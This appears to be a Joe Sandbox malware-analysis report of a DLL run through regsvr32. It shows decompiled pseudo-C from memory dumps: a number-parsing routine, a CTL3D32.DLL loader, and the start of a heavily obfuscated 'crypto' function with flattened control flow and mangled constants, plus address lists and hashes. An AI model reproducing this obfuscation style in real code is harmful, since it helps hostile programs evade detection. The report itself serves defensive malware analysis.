								__eax = E100222E3(__ecx, __esi, __bl & 0x000000ff, __esi);
								_pop(__ecx);
								_pop(__ecx);
								_push(1);
								_pop(__edx);
							}
							__eflags = __eax;
							if(__eax == 0) {
								goto L94;
							} else {
								__eax = __esi;
								goto L82;
							}
						case 6:
							_t51 = __edi - 2; // 0x0
							__ecx = _t51;
							__eflags = __bl - 0x31;
							_a12 = __ecx;
							if(__bl < 0x31) {
								L68:
								__eax = __bl;
								__eax = __bl - 0x2b;
								__eflags = __eax;
								if(__eax == 0) {
									goto L89;
								}
								__eax = __eax - 1;
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L88;
								}
								__eax = __eax - 3;
								__eflags = __eax;
								if(__eax != 0) {
									goto L110;
								}
								goto L71;
							}
							__eflags = __bl - 0x39;
							if(__bl <= 0x39) {
								goto L80;
							}
							goto L68;
						case 7:
							__eflags = __bl - 0x31;
							if(__bl < 0x31) {
								L83:
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									L94:
									__edi = _a12;
									goto L111;
								}
								L71:
								_push(8);
								goto L90;
							}
							__eflags = __bl - 0x39;
							if(__bl > 0x39) {
								goto L83;
							}
							goto L80;
						case 8:
							_v36 = __edx;
							while(1) {
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									break;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							__eflags = __bl - 0x31;
							if(__bl < 0x31) {
								goto L109;
							}
							__eflags = __bl - 0x39;
							if(__bl > 0x39) {
								goto L109;
							}
							L80:
							_push(9);
							L81:
							_pop(_t121);
							L82:
							_t148 = _t148 - 1;
							goto L7;
						case 9:
							_v36 = 1;
							__esi = 0;
							__eflags = 0;
							while(1) {
								__eflags =  *0x1009147c - 1;
								if( *0x1009147c <= 1) {
									__ecx =  *0x10091270; // 0x1009127a
									__eax = __bl & 0x000000ff;
									__eax = __bl & 4;
									__eflags = __eax;
								} else {
									__eax = __bl & 0x000000ff;
									__eax = E100222E3(__ecx, __esi, __bl & 0x000000ff, 4);
									_pop(__ecx);
									_pop(__ecx);
								}
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__ecx = __bl;
								_t66 = (__esi + __esi * 4) * 2; // -44
								__esi = __ecx + _t66 - 0x30;
								__eflags = __esi - 0x1450;
								if(__esi > 0x1450) {
									__esi = 0x1451;
									break;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							_v32 = __esi;
							while(1) {
								__eflags =  *0x1009147c - 1;
								if( *0x1009147c <= 1) {
									__ecx =  *0x10091270; // 0x1009127a
									__eax = __bl & 0x000000ff;
									__eax = __bl & 4;
									__eflags = __eax;
								} else {
									__eax = __bl & 0x000000ff;
									__eax = E100222E3(__ecx, __esi, __bl & 0x000000ff, 4);
									_pop(__ecx);
									_pop(__ecx);
								}
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							L109:
							_t148 = _t148 - 1;
							goto L111;
						case 0xa:
							goto L92;
						case 0xb:
							__eflags = _a28;
							if(_a28 == 0) {
								_push(0xa);
								__edi = __edi - 1;
								__eflags = __edi;
								_pop(__eax);
								goto L92;
							}
							__eax = __bl;
							_t55 = __edi - 1; // 0x1
							__ecx = _t55;
							__eax = __bl - 0x2b;
							__eflags = __eax;
							_a12 = __ecx;
							if(__eax == 0) {
								L89:
								_push(7);
								L90:
								_pop(_t121);
								goto L7;
							}
							__eax = __eax - 1;
							__eax = __eax - 1;
							__eflags = __eax;
							if(__eax != 0) {
								L110:
								__edi = __ecx;
								L111:
								__eflags = _v20;
								 *_a8 = _t148;
								if(_v20 == 0) {
									_t147 = 0;
									_t123 = 0;
									_t150 = 0;
									_t142 = 0;
									_v24 = 4;
									L138:
									_t144 = _a4;
									_t124 = _t123 | _v44;
									__eflags = _t124;
									_t144[1] = _t150;
									_t144[0] = _t142;
									_t144[2] = _t124;
									 *_t144 = _t147;
									return _v24;
								}
								_push(0x18);
								_pop(_t126);
								__eflags = _v8 - _t126;
								if(_v8 <= _t126) {
									_t127 = _v16;
								} else {
									__eflags = _v73 - 5;
									if(_v73 >= 5) {
										_t75 =  &_v73;
										 *_t75 = _v73 + 1;
										__eflags =  *_t75;
									}
									_v8 = _t126;
									_t127 = _v16 - 1;
									_v12 = _v12 + 1;
								}
								__eflags = _v8;
								if(_v8 <= 0) {
									_t147 = 0;
									_t123 = 0;
									_t150 = 0;
									_t142 = 0;
									goto L129;
								} else {
									while(1) {
										_t127 = _t127 - 1;
										__eflags =  *_t127;
										if( *_t127 != 0) {
											break;
										}
										_v8 = _v8 - 1;
										_v12 = _v12 + 1;
									}
									E100279C0(_t148,  &_v96, _v8,  &_v68);
									_t131 = _v32;
									__eflags = _v28;
									if(_v28 < 0) {
										_t131 =  ~_t131;
									}
									_t132 = _t131 + _v12;
									__eflags = _v36;
									if(_v36 == 0) {
										_t132 = _t132 + _a20;
										__eflags = _t132;
									}
									__eflags = _v40;
									if(_v40 == 0) {
										_t132 = _t132 - _a24;
										__eflags = _t132;
									}
									__eflags = _t132 - 0x1450;
									if(_t132 <= 0x1450) {
										__eflags = _t132 - 0xffffebb0;
										if(_t132 >= 0xffffebb0) {
											E10028EBD( &_v68, _t132, _a16);
											_t147 = _v68;
											_t142 = _v66;
											_t150 = _v62;
											_t123 = _v58;
											goto L129;
										}
										_v52 = 1;
										goto L128;
									} else {
										_v48 = 1;
										L128:
										_t142 = _a12;
										_t150 = _a12;
										_t123 = _a12;
										_t147 = _a12;
										L129:
										__eflags = _v48;
										if(_v48 == 0) {
											__eflags = _v52;
											if(_v52 != 0) {
												_t147 = 0;
												_t123 = 0;
												_t150 = 0;
												_t142 = 0;
												__eflags = 0;
												_v24 = 1;
											}
										} else {
											_t142 = 0;
											_t123 = 0x7fff;
											_t150 = 0x80000000;
											_t147 = 0;
											_v24 = 2;
										}
										goto L138;
									}
								}
							}
							L88:
							_v28 = _v28 | 0xffffffff;
							_push(7);
							_pop(__eax);
							goto L7;
					}
				}
				L92:
				if(_t121 == 0xa) {
					goto L111;
				}
				goto L7;
			}

0x10027a90
0x10027a98
0x10027a9b
0x10027a9d
0x10027a9e
0x10027aa1
0x10027aa4
0x10027aa7
0x10027aaa
0x10027aad
0x10027ab0
0x10027ab3
0x10027ab6
0x10027ab9
0x10027abc
0x10027abf
0x10027ac2
0x10027ac2
0x10027ac7
0x10027ad8
0x00000000
0x10027ad8
0x10027adb
0x10027ade
0x10027ade
0x10027ade
0x10027ae0
0x10027ae4
0x00000000
0x00000000
0x10027aea
0x00000000
0x10027af1
0x10027af4
0x10027b02
0x10027b02
0x10027b08
0x10027b14
0x10027b14
0x10027b17
0x10027b37
0x10027b3b
0x10027b3d
0x00000000
0x10027b3d
0x10027b1a
0x10027b1a
0x10027b1b
0x10027b2b
0x10027b2d
0x10027b34
0x00000000
0x10027b34
0x10027b1d
0x10027b20
0x00000000
0x00000000
0x00000000
0x10027b26
0x00000000
0x10027b08
0x10027af6
0x10027af9
0x00000000
0x00000000
0x00000000
0x00000000
0x10027b40
0x10027b43
0x10027b46
0x10027b4d
0x10027b4d
0x10027b53
0x00000000
0x00000000
0x10027b59
0x10027b5c
0x00000000
0x00000000
0x10027b5e
0x10027b61
0x00000000
0x00000000
0x10027b63
0x10027b66
0x00000000
0x00000000
0x00000000
0x10027b66
0x10027b48
0x10027b4b
0x00000000
0x00000000
0x00000000
0x00000000
0x10027b97
0x10027b9a
0x10027ba5
0x10027ba5
0x10027bab
0x10027b0a
0x10027b0a
0x00000000
0x10027b0a
0x10027bb1
0x10027bb4
0x00000000
0x00000000
0x10027bba
0x10027bba
0x00000000
0x10027bba
0x10027b9c
0x10027b9f
0x10027afb
0x10027afb
0x00000000
0x10027afb
0x00000000
0x00000000
0x10027bc1
0x10027bc4
0x10027bc4
0x10027bca
0x10027bdd
0x10027be3
0x10027be9
0x10027be9
0x10027bcc
0x10027bcc
0x10027bd1
0x10027bd6
0x10027bd7
0x10027bd8
0x10027bda
0x10027bda
0x10027beb
0x10027bed
0x00000000
0x00000000
0x10027bef
0x10027bf3
0x10027c05
0x10027c05
0x10027c05
0x10027bf5
0x10027bf5
0x10027bf8
0x10027bfb
0x10027bfe
0x10027c01
0x10027c01
0x10027c08
0x10027c0a
0x10027c0a
0x10027c0d
0x10027c13
0x00000000
0x00000000
0x10027c15
0x10027c15
0x00000000
0x00000000
0x10027c1c
0x10027c20
0x10027c23
0x10027c26
0x10027c35
0x10027c35
0x10027c35
0x10027c3b
0x10027c4e
0x10027c54
0x10027c5a
0x10027c5a
0x10027c3d
0x10027c3d
0x10027c42
0x10027c47
0x10027c48
0x10027c49
0x10027c4b
0x10027c4b
0x10027c5c
0x10027c5e
0x00000000
0x00000000
0x10027c60
0x10027c64
0x10027c66
0x10027c69
0x10027c6c
0x10027c6f
0x10027c72
0x10027c72
0x10027c72
0x10027c75
0x10027c75
0x10027c77
0x10027c79
0x10027c79
0x10027c7c
0x10027c7c
0x10027c7f
0x10027b8f
0x10027b8f
0x10027b90
0x00000000
0x10027b90
0x10027c85
0x10027c88
0x00000000
0x00000000
0x10027b68
0x10027b68
0x10027b6b
0x00000000
0x00000000
0x10027b71
0x10027b74
0x10027b88
0x10027b88
0x00000000
0x10027b88
0x10027b76
0x10027b79
0x00000000
0x00000000
0x10027b7f
0x10027b82
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10027c28
0x10027c28
0x10027c28
0x10027c2b
0x00000000
0x00000000
0x10027c2d
0x10027c30
0x10027c32
0x10027c32
0x00000000
0x00000000
0x10027c93
0x10027c99
0x10027c9c
0x10027caf
0x10027cb5
0x10027cbb
0x10027cbb
0x10027c9e
0x10027c9e
0x10027ca3
0x10027ca8
0x10027ca9
0x10027caa
0x10027cac
0x10027cac
0x10027cbd
0x10027cbf
0x00000000
0x10027cc5
0x10027cc5
0x00000000
0x10027cc5
0x00000000
0x10027cc9
0x10027cc9
0x10027ccc
0x10027ccf
0x10027cd2
0x10027cd9
0x10027cd9
0x10027cdc
0x10027cdc
0x10027cdf
0x00000000
0x00000000
0x10027ce1
0x10027ce2
0x10027ce2
0x10027ce3
0x00000000
0x00000000
0x10027ce5
0x10027ce5
0x10027ce8
0x00000000
0x00000000
0x00000000
0x10027ce8
0x10027cd4
0x10027cd7
0x00000000
0x00000000
0x00000000
0x00000000
0x10027d13
0x10027d16
0x10027d26
0x10027d26
0x10027d29
0x10027d6f
0x10027d6f
0x00000000
0x10027d6f
0x10027cee
0x10027cee
0x00000000
0x10027cee
0x10027d18
0x10027d1b
0x00000000
0x00000000
0x00000000
0x00000000
0x10027cf2
0x10027cf5
0x10027cf5
0x10027cf8
0x00000000
0x00000000
0x10027cfa
0x10027cfc
0x10027cfc
0x10027cff
0x10027d02
0x00000000
0x00000000
0x10027d08
0x10027d0b
0x00000000
0x00000000
0x10027d1d
0x10027d1d
0x10027d1f
0x10027d1f
0x10027d20
0x10027d20
0x00000000
0x00000000
0x10027d77
0x10027d7e
0x10027d7e
0x10027d80
0x10027d80
0x10027d87
0x10027d98
0x10027d9e
0x10027da4
0x10027da4
0x10027d89
0x10027d89
0x10027d8f
0x10027d94
0x10027d95
0x10027d95
0x10027da7
0x10027da9
0x00000000
0x00000000
0x10027dab
0x10027db1
0x10027db1
0x10027db5
0x10027dbb
0x10027dc2
0x00000000
0x10027dc2
0x10027dbd
0x10027dbf
0x10027dbf
0x10027dc7
0x10027dca
0x10027dca
0x10027dd1
0x10027de2
0x10027de8
0x10027dee
0x10027dee
0x10027dd3
0x10027dd3
0x10027dd9
0x10027dde
0x10027ddf
0x10027ddf
0x10027df1
0x10027df3
0x00000000
0x00000000
0x10027df5
0x10027df7
0x10027df7
0x10027dfa
0x10027dfa
0x00000000
0x00000000
0x00000000
0x00000000
0x10027d2d
0x10027d31
0x10027d5d
0x10027d5f
0x10027d5f
0x10027d60
0x00000000
0x10027d60
0x10027d33
0x10027d36
0x10027d36
0x10027d39
0x10027d39
0x10027d3c
0x10027d3f
0x10027d55
0x10027d55
0x10027d57
0x10027d57
0x00000000
0x10027d57
0x10027d41
0x10027d42
0x10027d42
0x10027d43
0x10027dfd
0x10027dfd
0x10027dff
0x10027e02
0x10027e06
0x10027e08
0x10027ee7
0x10027ee9
0x10027eeb
0x10027eed
0x10027eef
0x10027f0d
0x10027f0d
0x10027f10
0x10027f10
0x10027f14
0x10027f17
0x10027f1a
0x10027f22
0x10027f27
0x10027f27
0x10027e0e
0x10027e10
0x10027e11
0x10027e14
0x10027e2b
0x10027e16
0x10027e16
0x10027e1a
0x10027e1c
0x10027e1c
0x10027e1c
0x10027e1c
0x10027e1f
0x10027e25
0x10027e26
0x10027e26
0x10027e2e
0x10027e32
0x10027edd
0x10027edf
0x10027ee1
0x10027ee3
0x00000000
0x10027e38
0x10027e38
0x10027e38
0x10027e39
0x10027e3c
0x00000000
0x00000000
0x10027e3e
0x10027e41
0x10027e41
0x10027e51
0x10027e56
0x10027e5e
0x10027e61
0x10027e63
0x10027e63
0x10027e65
0x10027e68
0x10027e6b
0x10027e6d
0x10027e6d
0x10027e6d
0x10027e70
0x10027e73
0x10027e75
0x10027e75
0x10027e75
0x10027e78
0x10027e7d
0x10027eaf
0x10027eb4
0x10027ec7
0x10027ecc
0x10027ecf
0x10027ed2
0x10027ed5
0x00000000
0x10027ed8
0x10027eb6
0x00000000
0x10027e7f
0x10027e7f
0x10027e86
0x10027e86
0x10027e89
0x10027e8c
0x10027e8f
0x10027e92
0x10027e92
0x10027e96
0x10027ef8
0x10027efc
0x10027efe
0x10027f00
0x10027f02
0x10027f04
0x10027f04
0x10027f06
0x10027f06
0x10027e98
0x10027e98
0x10027e9a
0x10027e9f
0x10027ea4
0x10027ea6
0x10027ea6
0x00000000
0x10027e96
0x10027e7d
0x10027e32
0x10027d49
0x10027d49
0x10027d4d
0x10027d4f
0x00000000
0x00000000
0x10027aea
0x10027d61
0x10027d64
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 10027CF5
9, xrefs: 10027B48
0, xrefs: 10027C28
9, xrefs: 10027D18
0, xrefs: 10027BB1
e, xrefs: 10027B7F
1, xrefs: 10027CFF
+, xrefs: 10027B59
E, xrefs: 10027B71
9, xrefs: 10027B9C
+, xrefs: 10027C7C
C, xrefs: 10027B68
0, xrefs: 10027B63
-, xrefs: 10027B5E
c, xrefs: 10027B76
9, xrefs: 10027CD4
-, xrefs: 10027C85
0, xrefs: 10027D26
1, xrefs: 10027CCC
9, xrefs: 10027D08
9, xrefs: 10027AF6

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$c$e
API String ID: 0-1157002505
Opcode ID: d968fad1f192fbd6974ef52315c2463b5aa71c82faa6257f13d9e58a1020459e
Instruction ID: ce408597798aa9ddd1f3be218163361267fbdf8034b3934940f0b1ca7b20f743
Opcode Fuzzy Hash: d968fad1f192fbd6974ef52315c2463b5aa71c82faa6257f13d9e58a1020459e
Instruction Fuzzy Hash: 45E11030E5425ACFEB26CF60E8427ED7BF5FB08390FE4405BD809A6192D3749A81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 100657FF Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 99
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E100657FF() {
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t47;
				void* _t60;
				void* _t66;
				intOrPtr _t67;

				_t67 =  *0x10094b74; // 0x1
				if(_t67 == 0) {
					_push(E10062B5F);
					_t66 = E100656A3(0x10094e80);
					if( *((intOrPtr*)(_t66 + 4)) != 0) {
						L14:
						if( *(_t66 + 8) != 0) {
							return  *((intOrPtr*)(_t66 + 0x14))( *((intOrPtr*)(E10064B8B() + 8)));
						}
						return 0;
					}
					_t46 = LoadLibraryA("CTL3D32.DLL");
					 *(_t66 + 8) = _t46;
					if(_t46 != 0) {
						 *((intOrPtr*)(_t66 + 0xc)) = GetProcAddress(_t46, 0xc);
						 *((intOrPtr*)(_t66 + 0x10)) = GetProcAddress( *(_t66 + 8), 0xd);
						 *((intOrPtr*)(_t66 + 0x14)) = GetProcAddress( *(_t66 + 8), 0x10);
						 *((intOrPtr*)(_t66 + 0x18)) = GetProcAddress( *(_t66 + 8), 0x18);
						 *((intOrPtr*)(_t66 + 0x1c)) = GetProcAddress( *(_t66 + 8), 6);
						 *((intOrPtr*)(_t66 + 0x20)) = GetProcAddress( *(_t66 + 8), 0x15);
						 *((intOrPtr*)(_t66 + 0x24)) = GetProcAddress( *(_t66 + 8), 0x16);
						 *((intOrPtr*)(_t66 + 0x28)) = GetProcAddress( *(_t66 + 8), 3);
						 *((intOrPtr*)(_t66 + 0x2c)) = GetProcAddress( *(_t66 + 8), 0x19);
					}
					if( *((intOrPtr*)(_t66 + 0xc)) == 0 ||  *((intOrPtr*)(_t66 + 0x14)) == 0 ||  *((intOrPtr*)(_t66 + 0x1c)) == 0 ||  *((intOrPtr*)(_t66 + 0x20)) == 0 ||  *((intOrPtr*)(_t66 + 0x10)) == 0) {
						L11:
						_t47 =  *(_t66 + 8);
						 *((intOrPtr*)(_t66 + 0xc)) = 0;
						 *((intOrPtr*)(_t66 + 0x10)) = 0;
						 *((intOrPtr*)(_t66 + 0x14)) = 0;
						 *((intOrPtr*)(_t66 + 0x18)) = 0;
						 *((intOrPtr*)(_t66 + 0x1c)) = 0;
						 *((intOrPtr*)(_t66 + 0x20)) = 0;
						 *((intOrPtr*)(_t66 + 0x24)) = 0;
						 *((intOrPtr*)(_t66 + 0x28)) = 0;
						 *((intOrPtr*)(_t66 + 0x2c)) = 0;
						if(_t47 != 0) {
							FreeLibrary(_t47);
							 *(_t66 + 8) = 0;
						}
						goto L13;
					} else {
						_push( *((intOrPtr*)(E10064B8B() + 8)));
						if( *((intOrPtr*)(_t66 + 0xc))() != 0) {
							L13:
							 *((intOrPtr*)(_t66 + 4)) = 1;
							goto L14;
						}
						goto L11;
					}
				}
				_t60 = 1;
				return _t60;
			}

0x10065802
0x10065809
0x10065813
0x10065822
0x10065827
0x100658fa
0x100658fd
0x00000000
0x1006590b
0x00000000
0x100658ff
0x10065832
0x1006583a
0x1006583d
0x1006584d
0x10065857
0x10065861
0x1006586b
0x10065875
0x1006587f
0x10065889
0x10065893
0x1006589b
0x1006589e
0x100658a2
0x100658c7
0x100658c7
0x100658ca
0x100658cf
0x100658d2
0x100658d5
0x100658d8
0x100658db
0x100658de
0x100658e1
0x100658e4
0x100658e7
0x100658ea
0x100658f0
0x100658f0
0x00000000
0x100658b8
0x100658bd
0x100658c5
0x100658f3
0x100658f3
0x00000000
0x100658f3
0x00000000
0x100658c5
0x100658a2
0x1006580d
0x00000000

APIs

LoadLibraryA.KERNEL32(CTL3D32.DLL), ref: 10065832
GetProcAddress.KERNEL32(00000000,0000000C), ref: 10065849
GetProcAddress.KERNEL32(?,0000000D), ref: 10065853
GetProcAddress.KERNEL32(?,00000010), ref: 1006585D
GetProcAddress.KERNEL32(?,00000018), ref: 10065867
GetProcAddress.KERNEL32(?,00000006), ref: 10065871
GetProcAddress.KERNEL32(?,00000015), ref: 1006587B
GetProcAddress.KERNEL32(?,00000016), ref: 10065885
GetProcAddress.KERNEL32(?,00000003), ref: 1006588F
GetProcAddress.KERNEL32(?,00000019), ref: 10065899
FreeLibrary.KERNEL32(?), ref: 100658EA

Strings

CTL3D32.DLL, xrefs: 1006582D

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: CTL3D32.DLL
API String ID: 2449869053-1520792465
Opcode ID: 29711143658eda166b51a90794bb29f990f84a615544b8da099efdb4e6440825
Instruction ID: 6126d881a13d56b2d98f258aa8daa30ba1169105cc80149bb728155d671409d7
Opcode Fuzzy Hash: 29711143658eda166b51a90794bb29f990f84a615544b8da099efdb4e6440825
Instruction Fuzzy Hash: 2931E570900B46DFD7309F66C884A17BBE2FF44751B01893EE19A969A0DB72A841DF50

Uniqueness

Uniqueness Score: -1.00%

Function 003C9C3D Relevance: 20.8, Strings: 16, Instructions: 777
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E003C9C3D(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a28, intOrPtr _a32, signed int* _a36, signed int _a40, intOrPtr _a44, intOrPtr _a48) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t893;
				void* _t895;
				void* _t896;
				signed int _t912;
				intOrPtr _t942;
				signed int _t948;
				signed int _t963;
				signed int _t966;
				signed int _t981;
				signed int _t983;
				signed int _t995;
				signed int _t997;
				signed int _t999;
				void* _t1000;
				signed int _t1001;
				signed int _t1003;
				signed int _t1006;
				signed int _t1008;
				signed int _t1010;
				signed int _t1011;
				signed int _t1013;
				signed int _t1014;
				signed int _t1015;
				signed int _t1016;
				signed int _t1018;
				void* _t1021;
				signed int _t1075;
				signed int _t1077;
				signed int _t1080;
				signed int* _t1084;
				signed int* _t1086;
				void* _t1090;

				_t1084 = _a36;
				_push(_a48);
				_push(_a44);
				_v28 = __edx;
				_push(_a40);
				_push(_t1084);
				_push(_a32);
				_push(_a28);
				_push(_a24 & 0x0000ffff);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_a24 & 0x0000ffff);
				_t1075 = _a24;
				_t1086 =  &(( &_v80)[0xe]);
				_v12 = 0x78a4d;
				_t981 = 0;
				_v8 = 0x96190;
				_v4 = 0xfaf42;
				_t1077 = 0xf0d63;
				_v36 = 0;
				_v20 = 0x2d;
				_v24 = 0x7b;
				while(1) {
					L1:
					_t1021 = 0x783e6;
					while(1) {
						L2:
						_t893 = 0xc17f3;
						while(1) {
							L3:
							_t983 = 0x29;
							do {
								while(1) {
									L4:
									_t1090 = _t1077 - 0x6d7ef;
									if(_t1090 <= 0) {
										break;
									}
									__eflags = _t1077 - _t1021;
									if(_t1077 == _t1021) {
										__eflags = E003D2CAC(_t1075, _a16);
										_t1077 = 0xd30ba;
										_t895 = 1;
										_t981 =  !=  ? _t895 : _t981;
										L38:
										_t1021 = 0x783e6;
										_t983 = 0x29;
										L39:
										_t893 = 0xc17f3;
										goto L40;
									} else {
										__eflags = _t1077 - 0xbf785;
										if(_t1077 == 0xbf785) {
											_v56 = 0xc72cf4;
											_v56 = _v56 + 0xf87a;
											_v56 = _v56 + 0x1c52;
											_v56 = _v56 ^ 0x00c841d3;
											_t896 = E003C4B7C(_t1075, _v56);
											_v56 = 0x5b682c;
											_v56 = _v56 >> 7;
											_v56 = _v56 << 6;
											_t1021 = 0x783e6;
											_v56 = _v56 ^ 0x002db4c8;
											__eflags = _t896 - _v56;
											_t1077 =  ==  ? 0x783e6 : 0xd30ba;
											goto L2;
										} else {
											__eflags = _t1077 - _t893;
											if(_t1077 == _t893) {
												__eflags =  *_t1084;
												if( *_t1084 == 0) {
													_t1076 = _v36;
												} else {
													_v56 = 0x30ba30;
													_v56 = _v56 * 0x27;
													_v56 = _v56 ^ 0x076f744a;
													_v52 = 0x7ae04d;
													_v52 = _v52 + 0xffff2548;
													_v52 = _v52 ^ 0x00756c0f;
													_v48 = 0x758ea0;
													_v48 = _v48 | 0xf41fa914;
													_v48 = _v48 ^ 0xf472a0f4;
													_v68 = 0xd91264;
													_v68 = _v68 ^ 0x68eb6c84;
													_v68 = _v68 * 0x3f;
													_v68 = _v68 << 0xc;
													_v68 = _v68 ^ 0xd397d201;
													_t942 = E003CD933(_v56, _v52, 0x3c1764, _v48, _v68);
													_t1086 =  &(_t1086[3]);
													_t1076 = _t942;
													_v36 = _t942;
													_t983 = 0x29;
												}
												_v80 = 0xeebf4f;
												_v80 = _v80 ^ 0x784785b2;
												_v80 = _v80 ^ 0x78a9bafd;
												_v76 = 0x16b15e;
												_v76 = _v76 ^ 0xd71c3fa6;
												_v76 = _v76 ^ 0xd70acef8;
												_v64 = 0x50accf;
												_v64 = _v64 >> 0xf;
												_v64 = _v64 ^ 0x004000a1;
												_v56 = 0x83cc6a;
												_v56 = _v56 + 0xffffb80e;
												_v56 = _v56 + 0x6137;
												_v56 = _v56 ^ 0x0087e5af;
												_v60 = 0xebf4ba;
												_v60 = _v60 + 0xe45f;
												_v60 = _v60 ^ 0x04ecd919;
												_v72 = 0xade47;
												_v72 = _v72 >> 0xe;
												_v72 = _v72 / _t983;
												_v72 = _v72 | 0x84b2f63f;
												_v72 = _v72 ^ 0x84baf63f;
												_v52 = 0xaa0bf1;
												_v52 = _v52 ^ 0x48330675;
												_v52 = _v52 ^ 0x48990f84;
												_v48 = 0xdb4e31;
												_v48 = _v48 * 0x15;
												_v48 = _v48 ^ 0x11fd6b05;
												_v68 = 0xb1530b;
												_v68 = _v68 + 0x6c34;
												_v68 = _v68 << 3;
												_v68 = _v68 + 0xffff8f41;
												_v68 = _v68 ^ 0x858d8939;
